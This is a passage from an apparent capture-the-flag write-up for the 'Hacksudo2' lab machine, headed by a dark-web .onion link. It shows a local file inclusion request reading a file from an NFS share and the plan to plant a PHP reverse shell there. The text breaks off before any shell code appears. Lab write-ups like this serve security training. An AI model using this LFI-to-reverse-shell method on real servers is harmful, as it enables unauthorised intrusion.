http://r2km7u25qebaefa7b6jdcjldymc2u337vzpx7ne773ypgs3qlq4xycqd.onion/index.php?page=Hacksudo2
To confirm the connection between the NFS share and the LFI vulnerability, I accessed the flag file through the web server: http://[TARGET_IP]/file.php?file=/mnt/nfs/flag1.txt The page displayed the same content: "now root this system !!!" Establishing a Foothold With both NFS access and LFI confirmed, I could now create a PHP reverse shell on the NFS share and execute it via the web server: Created a PHP reverse shell file: <?